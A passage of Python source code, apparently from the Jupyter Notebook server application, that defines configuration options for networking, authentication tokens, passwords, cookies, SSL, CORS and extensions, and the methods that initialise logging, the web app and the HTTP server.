examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, Session, MappingKernelManager, KernelSpecManager,
ContentsManager, FileContentsManager, NotebookNotary,
GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient,
]
if terminado_available: # Only necessary when terminado is available
classes.append(TerminalManager)
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
stop=(NbserverStopApp, NbserverStopApp.description.splitlines()[0]),
password=(NotebookPasswordApp, NotebookPasswordApp.description.splitlines()[0]),
)
_log_formatter_cls = LogFormatter
_json_logging_import_error_logged = False
log_json = Bool(False, config=True,
help=_('Set to True to enable JSON formatted logs. '
'Run "pip install notebook[json-logging]" to install the '
'required dependent packages. Can also be set using the '
'environment variable JUPYTER_ENABLE_JSON_LOGGING=true.')
)
@default('log_json')
def _default_log_json(self):
"""Get the log_json value from the environment."""
return os.getenv('JUPYTER_ENABLE_JSON_LOGGING', 'false').lower() == 'true'
@validate('log_json')
def _validate_log_json(self, proposal):
# If log_json=True, see if the json_logging package can be imported and
# override _log_formatter_cls if so.
value = proposal['value']
if value:
try:
import json_logging
self.log.debug('initializing json logging')
json_logging.init_non_web(enable_json=True)
self._log_formatter_cls = json_logging.JSONLogFormatter
except ImportError:
# If configured for json logs and we can't do it, log a hint.
# Only log the error once though.
if not self._json_logging_import_error_logged:
self.log.warning(
'Unable to use json logging due to missing packages. '
'Run "pip install notebook[json-logging]" to fix.'
)
self._json_logging_import_error_logged = True
value = False
return value
@default('log_level')
def _default_log_level(self):
return logging.INFO
@default('log_datefmt')
def _default_log_datefmt(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
@default('log_format')
def _default_log_format(self):
"""override default log format to include time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
ignore_minified_js = Bool(False,
config=True,
help=_('Deprecated: Use minified JS file or not, mainly use during dev to avoid JS recompilation'),
)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
# Network related information
allow_origin = Unicode('', config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
"""
)
allow_origin_pat = Unicode('', config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
"""
)
allow_credentials = Bool(False, config=True,
help=_("Set the Access-Control-Allow-Credentials: true header")
)
allow_root = Bool(False, config=True,
help=_("Whether to allow the user to run the notebook as root.")
)
use_redirect_file = Bool(True, config=True,
help="""Disable launching browser by redirect file
For versions of notebook > 5.7.2, a security feature measure was added that
prevented the authentication token used to launch the browser from being visible.
This feature makes it difficult for other users on a multi-user system from
running code in your Jupyter session as you.
However, some environments (like Windows Subsystem for Linux (WSL) and Chromebooks),
launching a browser using a redirect file can lead the browser failing to load.
This is because of the difference in file structures/paths between the runtime and
the browser.
Disabling this setting to False will disable this behavior, allowing the browser
to launch by using a URL and visible token (as before).
"""
)
autoreload = Bool(False, config=True,
help= ("Reload the webapp when changes are made to any Python src files.")
)
default_url = Unicode('/tree', config=True,
help=_("The default URL to redirect to from `/`")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on.")
)
@default('ip')
def _default_ip(self):
"""Return localhost if available, 127.0.0.1 otherwise.
On some (horribly broken) systems, localhost cannot be bound.
"""
s = socket.socket()
try:
s.bind(('localhost', 0))
except socket.error as e:
self.log.warning(_("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s"), e)
return '127.0.0.1'
else:
s.close()
return 'localhost'
@validate('ip')
def _validate_ip(self, proposal):
value = proposal['value']
if value == u'*':
value = u''
return value
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example).""")
)
port_env = 'JUPYTER_PORT'
port_default_value = DEFAULT_NOTEBOOK_PORT
port = Integer(port_default_value, config=True,
help=_("The port the notebook server will listen on (env: JUPYTER_PORT).")
)
@default('port')
def port_default(self):
return int(os.getenv(self.port_env, self.port_default_value))
port_retries_env = 'JUPYTER_PORT_RETRIES'
port_retries_default_value = 50
port_retries = Integer(port_retries_default_value, config=True,
help=_("The number of additional ports to try if the specified port is not "
"available (env: JUPYTER_PORT_RETRIES).")
)
@default('port_retries')
def port_retries_default(self):
return int(os.getenv(self.port_retries_env, self.port_retries_default_value))
sock = Unicode(u'', config=True,
help=_("The UNIX socket the notebook server will listen on.")
)
sock_mode = Unicode('0600', config=True,
help=_("The permissions mode for UNIX socket creation (default: 0600).")
)
@validate('sock_mode')
def _validate_sock_mode(self, proposal):
value = proposal['value']
try:
converted_value = int(value.encode(), 8)
assert all((
# Ensure the mode is at least user readable/writable.
bool(converted_value & stat.S_IRUSR),
bool(converted_value & stat.S_IWUSR),
# And isn't out of bounds.
converted_value <= 2 ** 12
))
except ValueError as e:
raise TraitError(
'invalid --sock-mode value: %s, please specify as e.g. "0600"' % value
) from e
except AssertionError as e:
raise TraitError(
'invalid --sock-mode value: %s, must have u+rw (0600) at a minimum' % value
) from e
return value
certfile = Unicode(u'', config=True,
help=_("""The full path to an SSL/TLS certificate file.""")
)
keyfile = Unicode(u'', config=True,
help=_("""The full path to a private key file for usage with SSL/TLS.""")
)
client_ca = Unicode(u'', config=True,
help=_("""The full path to a certificate authority certificate for SSL/TLS client authentication.""")
)
cookie_secret_file = Unicode(config=True,
help=_("""The file where the cookie secret is stored.""")
)
@default('cookie_secret_file')
def _default_cookie_secret_file(self):
return os.path.join(self.runtime_dir, 'notebook_cookie_secret')
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
@default('cookie_secret')
def _default_cookie_secret(self):
if os.path.exists(self.cookie_secret_file):
with io.open(self.cookie_secret_file, 'rb') as f:
key = f.read()
else:
key = encodebytes(os.urandom(32))
self._write_cookie_secret_file(key)
h = hmac.new(key, digestmod=hashlib.sha256)
h.update(self.password.encode())
return h.digest()
def _write_cookie_secret_file(self, secret):
"""write my secret to my secret_file"""
self.log.info(_("Writing notebook server cookie secret to %s"), self.cookie_secret_file)
try:
with io.open(self.cookie_secret_file, 'wb') as f:
f.write(secret)
except OSError as e:
self.log.error(_("Failed to write cookie secret to %s: %s"),
self.cookie_secret_file, e)
try:
os.chmod(self.cookie_secret_file, 0o600)
except OSError:
self.log.warning(
_("Could not set permissions on %s"),
self.cookie_secret_file
)
token = Unicode('<generated>',
help=_("""Token used for authenticating first-time connections to the server.
The token can be read from the file referenced by JUPYTER_TOKEN_FILE or set directly
with the JUPYTER_TOKEN environment variable.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
""")
).tag(config=True)
_token_generated = True
@default('token')
def _token_default(self):
if os.getenv('JUPYTER_TOKEN'):
self._token_generated = False
return os.getenv('JUPYTER_TOKEN')
if os.getenv('JUPYTER_TOKEN_FILE'):
self._token_generated = False
with io.open(os.getenv('JUPYTER_TOKEN_FILE'), "r") as token_file:
return token_file.read()
if self.password:
# no token if password is enabled
self._token_generated = False
return u''
else:
self._token_generated = True
return binascii.hexlify(os.urandom(24)).decode('ascii')
max_body_size = Integer(512 * 1024 * 1024, config=True,
help="""
Sets the maximum allowed size of the client request body, specified in
the Content-Length request header field. If the size in a request
exceeds the configured value, a malformed HTTP message is returned to
the client.
Note: max_body_size is applied even in streaming mode.
"""
)
max_buffer_size = Integer(512 * 1024 * 1024, config=True,
help="""
Gets or sets the maximum amount of memory, in bytes, that is allocated
for use by the buffer manager.
"""
)
min_open_files_limit = Integer(config=True,
help="""
Gets or sets a lower bound on the open file handles process resource
limit. This may need to be increased if you run into an
OSError: [Errno 24] Too many open files.
This is not applicable when running on Windows.
""")
@default('min_open_files_limit')
def _default_min_open_files_limit(self):
if resource is None:
# Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)
return None
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
DEFAULT_SOFT = 4096
if hard >= DEFAULT_SOFT:
return DEFAULT_SOFT
self.log.debug("Default value for min_open_files_limit is ignored (hard=%r, soft=%r)", hard, soft)
return soft
@observe('token')
def _token_changed(self, change):
self._token_generated = False
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from notebook.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
password_required = Bool(False, config=True,
help="""Forces users to use a password for the Notebook server.
This is useful in a multi user environment, for instance when
everybody in the LAN can access each other's machine through ssh.
In such a case, serving the notebook server on localhost is not secure
since any user can connect to the notebook server via ssh.
"""
)
allow_password_change = Bool(True, config=True,
help="""Allow password to be changed at login for the notebook server.
While loggin in with a token, the notebook server UI will give the opportunity to
the user to enter a new password at the same time that will replace
the token login mechanism.
This can be set to false to prevent changing password from the UI/API.
"""
)
disable_check_xsrf = Bool(False, config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
"""
)
allow_remote_access = Bool(config=True,
help="""Allow requests where the Host header doesn't point to a local server
By default, requests get a 403 forbidden response if the 'Host' header
shows that the browser thinks it's on a non-local domain.
Setting this option to True disables this check.
This protects against 'DNS rebinding' attacks, where a remote web server
serves you a page and then changes its DNS to send later requests to a
local IP, bypassing same-origin checks.
Local IP addresses (such as 127.0.0.1 and ::1) are allowed as local,
along with hostnames configured in local_hostnames.
""")
@default('allow_remote_access')
def _default_allow_remote(self):
"""Disallow remote access if we're listening only on loopback addresses"""
# if blank, self.ip was configured to "*" meaning bind to all interfaces,
# see _valdate_ip
if self.ip == "":
return True
try:
addr = ipaddress.ip_address(self.ip)
except ValueError:
# Address is a hostname
for info in socket.getaddrinfo(self.ip, self.port, 0, socket.SOCK_STREAM):
addr = info[4][0]
if not py3compat.PY3:
addr = addr.decode('ascii')
try:
parsed = ipaddress.ip_address(addr.split('%')[0])
except ValueError:
self.log.warning("Unrecognised IP address: %r", addr)
continue
# Macs map localhost to 'fe80::1%lo0', a link local address
# scoped to the loopback interface. For now, we'll assume that
# any scoped link-local address is effectively local.
if not (parsed.is_loopback
or (('%' in addr) and parsed.is_link_local)):
return True
return False
else:
return not addr.is_loopback
local_hostnames = List(Unicode(), ['localhost'], config=True,
help="""Hostnames to allow as local when allow_remote_access is False.
Local IP addresses (such as 127.0.0.1 and ::1) are automatically accepted
as local as well.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
webapp_settings = Dict(config=True,
help=_("DEPRECATED, use tornado_settings")
)
@observe('webapp_settings')
def _update_webapp_settings(self, change):
self.log.warning(_("\n webapp_settings is deprecated, use tornado_settings.\n"))
self.tornado_settings = change['new']
tornado_settings = Dict(config=True,
help=_("Supply overrides for the tornado.web.Application that the "
"Jupyter notebook uses."))
websocket_compression_options = Any(None, config=True,
help=_("""
Set the tornado compression options for websocket connections.
This value will be returned from :meth:`WebSocketHandler.get_compression_options`.
None (default) will disable compression.
A dict (even an empty one) will enable compression.
See the tornado docs for WebSocketHandler.get_compression_options for details.
""")
)
terminado_settings = Dict(config=True,
help=_('Supply overrides for terminado. Currently only supports "shell_command". '
'On Unix, if "shell_command" is not provided, a non-login shell is launched '
"by default when the notebook server is connected to a terminal, a login "
"shell otherwise."))
cookie_options = Dict(config=True,
help=_("Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details.")
)
get_secure_cookie_kwargs = Dict(config=True,
help=_("Extra keyword arguments to pass to `get_secure_cookie`."
" See tornado's get_secure_cookie docs for details.")
)
ssl_options = Dict(config=True,
help=_("""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details."""))
jinja_environment_options = Dict(config=True,
help=_("Supply extra arguments that will be passed to Jinja environment."))
jinja_template_vars = Dict(
config=True,
help=_("Extra variables to supply to jinja templates when rendering."),
)
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
@observe('enable_mathjax')
def _update_enable_mathjax(self, change):
"""set mathjax url to empty if mathjax is disabled"""
if not change['new']:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
@validate('base_url')
def _update_base_url(self, proposal):
value = proposal['value']
if not value.startswith('/'):
value = '/' + value
if not value.endswith('/'):
value = value + '/'
return value
base_project_url = Unicode('/', config=True, help=_("""DEPRECATED use base_url"""))
@observe('base_project_url')
def _update_base_project_url(self, change):
self.log.warning(_("base_project_url is deprecated, use base_url"))
self.base_url = change['new']
extra_static_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(),
help=_("""Path to search for custom.js, css""")
)
@default('static_custom_path')
def _default_static_custom_path(self):
return [
os.path.join(d, 'custom') for d in (
self.config_dir,
DEFAULT_STATIC_FILES_PATH)
]
extra_template_paths = List(Unicode(), config=True,
help=_("""Extra paths to search for serving jinja templates.
Can be used to override templates from notebook.templates.""")
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_nbextensions_path = List(Unicode(), config=True,
help=_("""extra paths to look for Javascript notebook extensions""")
)
extra_services = List(Unicode(), config=True,
help=_("""handlers that should be loaded at higher priority than the default services""")
)
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = self.extra_nbextensions_path + jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
websocket_url = Unicode("", config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
"""
)
mathjax_url = Unicode("", config=True,
help="""A custom url for MathJax.js.
Should be in the form of a case-sensitive url to MathJax,
for example: /static/components/MathJax/MathJax.js
"""
)
@default('mathjax_url')
def _default_mathjax_url(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.tornado_settings.get("static_url_prefix", "static")
return url_path_join(static_url_prefix, 'components', 'MathJax', 'MathJax.js')
@observe('mathjax_url')
def _update_mathjax_url(self, change):
new = change['new']
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info(_("Using MathJax: %s"), new)
mathjax_config = Unicode("TeX-AMS-MML_HTMLorMML-full,Safe", config=True,
help=_("""The MathJax.js configuration file that is to be used.""")
)
@observe('mathjax_config')
def _update_mathjax_config(self, change):
self.log.info(_("Using MathJax configuration file: %s"), change['new'])
quit_button = Bool(True, config=True,
help="""If True, display a button in the dashboard to quit
(shutdown the notebook server)."""
)
# We relax this trait to handle Contents Managers using jupyter_server
# as the core backend.
contents_manager_class = TypeFromClasses(
default_value=LargeFileManager,
klasses=[
ContentsManager,
# To make custom ContentsManagers both forward+backward
# compatible, we'll relax the strictness of this trait
# and allow jupyter_server contents managers to pass
# through. If jupyter_server is not installed, this class
# will be ignored.
'jupyter_server.contents.services.managers.ContentsManager'
],
config=True,
help=_('The notebook manager class to use.')
)
# Throws a deprecation warning to jupyter_server based contents managers.
@observe('contents_manager_class')
def _observe_contents_manager_class(self, change):
new = change['new']
# If 'new' is a class, get a string representing the import
# module path.
if inspect.isclass(new):
new = new.__module__
if new.startswith('jupyter_server'):
self.log.warning(
"The specified 'contents_manager_class' class inherits a manager from the "
"'jupyter_server' package. These (future-looking) managers are not "
"guaranteed to work with the 'notebook' package. For longer term support "
"consider switching to NBClassic—a notebook frontend that leverages "
"Jupyter Server as its server backend."
)
kernel_manager_class = Type(
default_value=MappingKernelManager,
klass=MappingKernelManager,
config=True,
help=_('The kernel manager class to use.')
)
session_manager_class = Type(
default_value=SessionManager,
config=True,
help=_('The session manager class to use.')
)
config_manager_class = Type(
default_value=ConfigManager,
config = True,
help=_('The config manager class to use')
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
The Api of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
"""
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help=_('The login handler class to use.'),
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help=_('The logout handler class to use.'),
)
trust_xheaders = Bool(False, config=True,
help=(_("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL"))
)
info_file = Unicode()
@default('info_file')
def _default_info_file(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
browser_open_file = Unicode()
@default('browser_open_file')
def _default_browser_open_file(self):
basename = "nbserver-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
pylab = Unicode('disabled', config=True,
help=_("""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
""")
)
@observe('pylab')
def _update_pylab(self, change):
"""when --pylab is specified, display a warning and exit"""
if change['new'] != 'warn':
backend = ' %s' % change['new']
else:
backend = ''
self.log.error(_("Support for specifying --pylab on the command line has been removed."))
self.log.error(
_("Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.").format(backend)
)
self.exit(1)
notebook_dir = Unicode(config=True,
help=_("The directory to use for notebooks and kernels.")
)
@default('notebook_dir')
def _default_notebook_dir(self):
if self.file_to_run:
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return py3compat.getcwd()
@validate('notebook_dir')
def _notebook_dir_validate(self, proposal):
value = proposal['value']
# Strip any trailing slashes
# *except* if it's root
_, path = os.path.splitdrive(value)
if path == os.sep:
return value
value = value.rstrip(os.sep)
if not os.path.isabs(value):
# If we receive a non-absolute path, make it absolute.
value = os.path.abspath(value)
if not os.path.isdir(value):
raise TraitError(trans.gettext("No such notebook dir: '%r'") % value)
return value
# TODO: Remove me in notebook 5.0
server_extensions = List(Unicode(), config=True,
help=(_("DEPRECATED use the nbserver_extensions dict instead"))
)
@observe('server_extensions')
def _update_server_extensions(self, change):
self.log.warning(_("server_extensions is deprecated, use nbserver_extensions"))
self.server_extensions = change['new']
nbserver_extensions = Dict({}, config=True,
help=(_("Dict of Python modules to load as notebook server extensions."
"Entry values can be used to enable and disable the loading of"
"the extensions. The extensions will be loaded in alphabetical "
"order."))
)
reraise_server_extension_failures = Bool(
False,
config=True,
help=_("Reraise exceptions encountered loading server extensions?"),
)
iopub_msg_rate_limit = Float(1000, config=True, help=_("""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited."""))
iopub_data_rate_limit = Float(1000000, config=True, help=_("""(bytes/sec)
Maximum rate at which stream output can be sent on iopub before they are
limited."""))
rate_limit_window = Float(3, config=True, help=_("""(sec) Time window used to
check the message and data rate limits."""))
shutdown_no_activity_timeout = Integer(0, config=True,
help=("Shut down the server after N seconds with no kernels or "
"terminals running and no activity. "
"This can be used together with culling idle kernels "
"(MappingKernelManager.cull_idle_timeout) to "
"shutdown the notebook server when it's not in use. This is not "
"precisely timed: it may shut down up to a minute later. "
"0 (the default) disables this automatic shutdown.")
)
terminals_enabled = Bool(True, config=True,
help=_("""Set to False to disable terminals.
This does *not* make the notebook server more secure by itself.
Anything the user can in a terminal, they can also do in a notebook.
Terminals may also be automatically disabled if the terminado package
is not available.
"""))
authenticate_prometheus = Bool(
True,
help=""""
Require authentication to access prometheus metrics.
"""
).tag(config=True)
@default('authenticate_prometheus')
def _default_authenticate_prometheus(self):
""" Authenticate Prometheus by default, unless auth is disabled. """
auth = bool(self.password) or bool(self.token)
if auth is False:
self.log.info(_("Authentication of /metrics is OFF, since other authentication is disabled."))
return auth
@observe('authenticate_prometheus')
def _update_authenticate_prometheus(self, change):
newauth = change['new']
if self.authenticate_prometheus is True and newauth is False:
self.log.info(_("Authentication of /metrics is being turned OFF."))
self.authenticate_prometheus = newauth
# Since use of terminals is also a function of whether the terminado package is
# available, this variable holds the "final indication" of whether terminal functionality
# should be considered (particularly during shutdown/cleanup). It is enabled only
# once both the terminals "service" can be initialized and terminals_enabled is True.
# Note: this variable is slightly different from 'terminals_available' in the web settings
# in that this variable *could* remain false if terminado is available, yet the terminal
# service's initialization still fails. As a result, this variable holds the truth.
terminals_available = False
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical(_("No such file or directory: %s"), f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the config dirs.
c = Config()
if os.path.isdir(f):
c.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
c.NotebookApp.file_to_run = f
self.update_config(c)
def init_configurables(self):
# If gateway server is configured, replace appropriate managers to perform redirection. To make
# this determination, instantiate the GatewayClient config singleton.
self.gateway_config = GatewayClient.instance(parent=self)
if self.gateway_config.gateway_enabled:
self.kernel_manager_class = 'notebook.gateway.managers.GatewayKernelManager'
self.session_manager_class = 'notebook.gateway.managers.GatewaySessionManager'
self.kernel_spec_manager_class = 'notebook.gateway.managers.GatewayKernelSpecManager'
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
# Ensure the appropriate version of Python and jupyter_client is available.
if isinstance(self.kernel_manager, AsyncMappingKernelManager):
if not async_kernel_mgmt_available: # Can be removed once jupyter_client >= 6.1 is required.
raise ValueError("You are using `AsyncMappingKernelManager` without an appropriate "
"jupyter_client installed! Please upgrade jupyter_client or change kernel managers.")
self.log.info("Asynchronous kernel management has been configured to use '{}'.".
format(self.kernel_manager.__class__.__name__))
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dispatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (NotebookApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_resources(self):
"""initialize system resources"""
if resource is None:
self.log.debug('Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)')
return
old_soft, old_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
soft = self.min_open_files_limit
hard = old_hard
if old_soft < soft:
if hard < soft:
hard = soft
self.log.debug(
'Raising open file limit: soft {}->{}; hard {}->{}'.format(old_soft, soft, old_hard, hard)
)
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.tornado_settings['allow_origin'] = self.allow_origin
self.tornado_settings['websocket_compression_options'] = self.websocket_compression_options
if self.allow_origin_pat:
self.tornado_settings['allow_origin_pat'] = re.compile(self.allow_origin_pat)
self.tornado_settings['allow_credentials'] = self.allow_credentials
self.tornado_settings['autoreload'] = self.autoreload
self.tornado_settings['cookie_options'] = self.cookie_options
self.tornado_settings['get_secure_cookie_kwargs'] = self.get_secure_cookie_kwargs
self.tornado_settings['token'] = self.token
# ensure default_url starts with base_url
if not self.default_url.startswith(self.base_url):
self.default_url = url_path_join(self.base_url, self.default_url)
if self.password_required and (not self.password):
self.log.critical(_("Notebook servers are configured to only be run with a password."))
self.log.critical(_("Hint: run the following command to set a password"))
self.log.critical(_("\t$ python -m notebook.auth password"))
sys.exit(1)
# Socket options validation.
if self.sock:
if self.port != DEFAULT_NOTEBOOK_PORT:
self.log.critical(
_('Options --port and --sock are mutually exclusive. Aborting.'),
)
sys.exit(1)
else:
# Reset the default port if we're using a UNIX socket.
self.port = 0
if self.open_browser:
# If we're bound to a UNIX socket, we can't reliably connect from a browser.
self.log.info(
_('Ignoring --NotebookApp.open_browser due to --sock being used.'),
)
if self.file_to_run:
self.log.critical(
_('Options --NotebookApp.file_to_run and --sock are mutually exclusive.'),
)
sys.exit(1)
if sys.platform.startswith('win'):
self.log.critical(
_('Option --sock is not supported on Windows, but got value of %s. Aborting.' % self.sock),
)
sys.exit(1)
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.contents_manager,
self.session_manager, self.kernel_spec_manager,
self.config_manager, self.extra_services,
self.log, self.base_url, self.default_url, self.tornado_settings,
self.jinja_environment_options,
)
ssl_options = self.ssl_options
if self.certfile:
ssl_options['certfile'] = self.certfile
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
if self.client_ca:
ssl_options['ca_certs'] = self.client_ca
if not ssl_options:
# None indicates no SSL config
ssl_options = None
else:
# SSL may be missing, so only import it if it's to be used
import ssl
# PROTOCOL_TLS selects the highest ssl/tls protocol version that both the client and
# server support. When PROTOCOL_TLS is not available use PROTOCOL_SSLv23.
# PROTOCOL_TLS is new in version 2.7.13, 3.5.3 and 3.6
ssl_options.setdefault(
'ssl_version',
getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)
)
if ssl_options.get('ca_certs', False):
ssl_options.setdefault('cert_reqs', ssl.CERT_REQUIRED)
self.login_handler_class.validate_security(self, ssl_options=ssl_options)
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders,
max_body_size=self.max_body_size,
max_buffer_size=self.max_buffer_size)
success = self._bind_http_server()
if not success:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
self.exit(1)
def _bind_http_server(self):
return self._bind_http_server_unix() if self.sock else self._bind_http_server_tcp()
def _bind_http_server_unix(self):
if unix_socket_in_use(self.sock):
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
try:
sock = bind_unix_socket(self.sock, mode=int(self.sock_mode.encode(), 8))
self.http_server.add_socket(sock)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on sock %s denied") % self.sock)
return False
else:
raise
else:
return True
def _bind_http_server_tcp(self):
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
eacces = (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES))
if sys.platform == 'cygwin':
# Cygwin has a bug that causes EPERM to be returned in this
# case instead of EACCES:
# https://cygwin.com/ml/cygwin/2019-04/msg00160.html
eacces += (errno.EPERM,)
if e.errno == errno.EADDRINUSE:
if self.port_retries:
self.log.info(_('The port %i is already in use, trying another port.') % port)
else:
self.log.info(_('The port %i is already in use.') % port)
continue
elif e.errno in eacces:
self.log.warning(_("Permission to listen on port %i denied.") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
if self.port_retries:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
else:
self.log.critical(_('ERROR: the notebook server could not be started because '
'port %i is not available.') % port)
self.exit(1)
return success
def _concat_token(self, url):
token = self.token if self._token_generated else '...'
return url_concat(url, {'token': token})
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
elif self.sock:
url = self._unix_sock_url()
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._tcp_url(ip)
if self.token and not self.sock:
url = self._concat_token(url)
if not self.custom_display_url:
url += '\n or %s' % self._concat_token(self._tcp_url('127.0.0.1'))
return url
@property
def connection_url(self):
if self.sock:
return self._unix_sock_url()
else:
ip = self.ip if self.ip else 'localhost'
